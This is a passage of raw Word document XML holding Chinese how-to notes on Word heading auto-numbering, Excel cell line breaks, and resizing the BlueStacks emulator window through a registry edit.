        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">中的标题几. 如果 是 3.3.4.5.3 瓦斯吸附试验 这样的 右边应该是标题 5 ,但图上没有,那么点 上面的 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>新样式</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,如下图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00E24B28" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="3324225"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="10" name="图片 10" descr="说明: C:\Users\Administrator\AppData\Roaming\Tencent\Users\1415532825\QQ\WinTemp\RichOle\AFN)]F{JVKKN`O$$S@]1WL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C:\Users\Administrator\AppData\Roaming\Tencent\Users\1415532825\QQ\WinTemp\RichOle\AFN)]F{JVKKN`O$$S@]1WL7.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86400" cy="3324225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00E24B28" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">在 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>样式基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>里面选择你需要的几级标题,加入进去(也可以修改格式,如标题字体大小颜色什么的).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00E24B28" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>比如 瓦斯吸附理论分析 是二级标题,则按以下步骤进行编号:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:widowControl/>
        <w:ind w:left="4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1 将鼠标放在 瓦斯吸附理论分析 这一行,放在任意位置都行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:widowControl/>
        <w:ind w:left="4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 xml:space="preserve">2 点击右边的 标题2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:widowControl/>
        <w:ind w:left="4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3将鼠标放在 瓦斯吸附理论分析 这一行,放在任意位置都行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:widowControl/>
        <w:ind w:left="4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4 右键点击 项目符号和编号 如下图:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="008A5E59" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">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419475" cy="2914650"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="9" name="图片 9" descr="说明: C:\Users\Administrator\AppData\Roaming\Tencent\Users\1415532825\QQ\WinTemp\RichOle\TK[8Q9IHUSH%LTTI(0JIT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C:\Users\Administrator\AppData\Roaming\Tencent\Users\1415532825\QQ\WinTemp\RichOle\TK[8Q9IHUSH%LTTI(0JIT47.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419475" cy="2914650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:widowControl/>
        <w:ind w:left="4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5 会出现下图:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00C563F6" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>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5057775" cy="3400425"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="8" name="图片 8" descr="说明: C:\Users\Administrator\AppData\Roaming\Tencent\Users\1415532825\QQ\WinTemp\RichOle\L}(OMZVVX4)}W%EXWGI0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C:\Users\Administrator\AppData\Roaming\Tencent\Users\1415532825\QQ\WinTemp\RichOle\L}(OMZVVX4)}W%EXWGI0Y[3.jp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057775" cy="3400425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:widowControl/>
        <w:ind w:left="4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6 选择 蓝框那个 类型的,确定,这样就实现了自动编号.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>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5772150" cy="5133975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="7" name="图片 7" descr="说明: C:\Users\Administrator\AppData\Roaming\Tencent\Users\1415532825\QQ\WinTemp\RichOle\BJQQZ%2)@(_CQAFC2JSFEL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C:\Users\Administrator\AppData\Roaming\Tencent\Users\1415532825\QQ\WinTemp\RichOle\BJQQZ%2)@(_CQAFC2JSFELM.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772150" cy="5133975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00A753C8" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">结果如上图,左边的文档结构视图在 视图 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 文档结构图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00053837" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="004353CC" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>章节编号异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若异常了的话</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则先用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1,2,3,4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那个编号替换一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再换回来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.2.3.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就好了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F42DA" w:rsidRDefault="006F42DA" w:rsidP="006F42DA">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>excel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F42DA" w:rsidRDefault="006F42DA" w:rsidP="006F42DA">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格子中换行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F42DA" w:rsidRPr="006F42DA" w:rsidRDefault="00690833" w:rsidP="006F42DA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>alt+enter</w:t>
      </w:r>
      <w:r w:rsidR="00D16A25">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00D16A25">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者右键设置自动换行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ulestatcks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调整分辨率最好调成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>600*400</w:t>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BlueStacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安卓模拟器屏幕窗口大小的调整方法，使用过</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BlueStacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安卓模拟器的朋友都知道，这款安卓模拟器非常好用，占用资源很少，但是有个缺点是占屏很大，用鼠标拖拽边框也不能调整大小，下面就让我教大家怎么调大小。</w:t>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BlueStacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安卓模拟器屏幕窗口大小的调整方法：</w:t>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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：首先当然是要安装好</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BlueStacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安卓模拟器了。打开注册表，方法：点击电脑</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>开始</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>按钮选择运行，或者按快捷键</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> win+r</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>直接打开。输入命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>regedit</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击确定或者直接按键盘上的回车键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00667930" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="450" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4191000" cy="2819400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="图片 6" descr="说明: http://www.xiazaiba.com/uploadfiles/editor/2014/0617/water_20140617160025207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descr="说明: http://www.xiazaiba.com/uploadfiles/editor/2014/0617/water_2014061716002520764.jp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191000" cy="2819400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：找到注册表地址：</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[HKEY_LOCAL_MACHINESOFTWAREBlueStacksGuestsAndroidFrameBuffer]</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，就是红色框框那些。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00667930" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="450" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4772025" cy="3333750"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="5" name="图片 5" descr="说明: http://www.xiazaiba.com/uploadfiles/editor/2014/0617/water_20140617160037379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descr="说明: http://www.xiazaiba.com/uploadfiles/editor/2014/0617/water_2014061716003737901.jp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772025" cy="3333750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：修改对应项：</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Width</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（宽），</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Height</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（高）。</w:t>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默认为十六进制，</w:t>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可以选十进制修改值（相对好调整些而已）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00667930" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="450" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
